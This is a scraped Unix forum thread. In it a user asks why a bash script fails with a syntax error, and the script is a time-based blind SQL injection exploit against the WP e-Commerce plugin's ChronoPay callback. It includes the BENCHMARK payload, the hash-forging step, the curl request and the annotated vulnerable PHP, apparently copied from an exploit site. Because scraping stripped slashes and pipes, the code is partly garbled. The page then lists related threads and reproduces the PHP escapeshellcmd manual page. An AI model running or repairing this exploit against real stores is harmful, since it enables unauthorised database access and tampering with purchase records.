Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Syntax error near unexpected token `('
Top Forums Shell Programming and Scripting Syntax error near unexpected token `(' Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Old 05-02-2012
Syntax error near unexpected token `('
What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
 

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

sh syntax error unexpected token done

I'm getting the following error: line 21: syntax error near unexpected token `done` line 21: `done` and I haven't been able to figure out why. Here is my code #!/bin/sh if ; then echo 'Usage: rename getexp/replStr ' exit 0 fi arg = $1 shift while ; do (5 Replies)
Discussion started by: NullPointer
5 Replies

2. Shell Programming and Scripting

Syntax error near unexpected token `('

Guys , This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script. Below is my original script pasted. #!/bin/bash Script Creation Date 01/21/2010 Author baraghun ... (7 Replies)
Discussion started by: raghunsi
7 Replies

3. UNIX for Advanced & Expert Users

syntax error near unexpected token '{

Hi, I am running the following script through cygwin and getting below mentioned error. ******************************************* #!/bin/sh # constants WORK_DIR="deploy" INFOFILE="deploy.info" INTROFILE="Intro.sh" CMGMT_PKG="com.kintana.cmgmt.deploy" DEPLOY_PREFIX="mitg" ... (2 Replies)
Discussion started by: MandyR
2 Replies

4. Shell Programming and Scripting

syntax error near unexpected token `='

Hi all, This is a script which converts hex to bin. However am finding an error while executing syntax error near unexpected token `=' `($hexfile, $binfile) = @ARGV;' I am running using ./fil.pl <hexfile> <binfile> ################################################### # # this script... (3 Replies)
Discussion started by: jaango123
3 Replies

5. Shell Programming and Scripting

Syntax error near unexpected token `else'

Hi, I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script : #!/bin/bash cd... (6 Replies)
Discussion started by: Aryan12345
6 Replies

6. Shell Programming and Scripting

Syntax error near unexpected token '('

I tried to execute the code but I got this error ./Array.c: line 9: syntax error near unexpected token '(' ./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);' and #include<stdio.h> #define MAXARRAY 1000 main() { int a, nvals; nvals =... (7 Replies)
Discussion started by: sgradywhite
7 Replies

7. Shell Programming and Scripting

Syntax error near unexpected token

Hi all, I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction. count=$((1)) for item in `cat test1.txt` printf %s `sed -n $((count))p test2.txt` > test3.txt count=$((count+1)) do something done I get ; ./why.sh: line 3:... (14 Replies)
Discussion started by: y33t
14 Replies

8. How to Post in the The UNIX and Linux Forums

Syntax error near unexpected token `('

I have 2 files like a.txt and b.txt and the content is as below cat a.txt 810750125 117780 /BSCSQAT4A/bscsqat4a/lib/jar/wclt_common.jar 1803152428 13300 /BSCSQAT4A/bscsqat4a/lib/jar/WFMSSupportTool.jar 2663502779 67049 /BSCSQAT4A/bscsqat4a/lib/jar/wma.jar 687942896 665272... (1 Reply)
Discussion started by: ranabhavish
1 Replies

9. UNIX for Beginners Questions & Answers

Syntax error near unexpected token

Dears, While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this. test.sh: line 30: syntax error near unexpected token `done' test.sh: line 30: ` done ' #!/bin/sh # Rev. PA1 # author: eillops # date: 26-04-2018 # #... (1 Reply)
Discussion started by: Kamesh G
1 Replies

10. Ubuntu

Syntax error near unexpected token `('

detect_mouse_mvt.sh /home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `(' /home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')' #!/bin/bash # # fh = file('/dev/input/mice') while True: fh.read(3) print 'Mouse... (15 Replies)
Discussion started by: drew77
15 Replies

LEARN ABOUT PHP

escapeshellcmd

ESCAPESHELLCMD(3)							 1							 ESCAPESHELLCMD(3)

escapeshellcmd - Escape shell metacharacters

SYNOPSIS

       string escapeshellcmd (string  $command)

DESCRIPTION

       escapeshellcmd(3)  escapes  any	characters in a string that might be used to trick a shell command into executing arbitrary commands. This
       function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec(3) or system(3)
       functions, or to the backtick operator.

	Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$, x0A and xFF.  ' and " are escaped only if they are not paired. In
       Windows, all these characters plus % are replaced by a space instead.

PARAMETERS

	      o $command
		- The command that will be escaped.

RETURN VALUES

	The escaped string.

EXAMPLES

       Example #1

	      escapeshellcmd(3) example

	      <?php
	      // We allow arbitrary number of arguments intentionally here.
	      $command = './configure '.$_POST['configure_options'];

	      $escaped_command = escapeshellcmd($command);

	      system($escaped_command);
	      ?>

       Warning

	      escapeshellcmd(3) should be used on the whole command string, and it still allows the attacker to pass  arbitrary  number  of  argu-
	      ments. For escaping a single argument escapeshellarg(3) should be used instead.

SEE ALSO

       escapeshellarg(3), exec(3), popen(3), system(3), backtick operator.

PHP Documentation Group 													 ESCAPESHELLCMD(3)
All times are GMT -4. The time now is 02:53 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy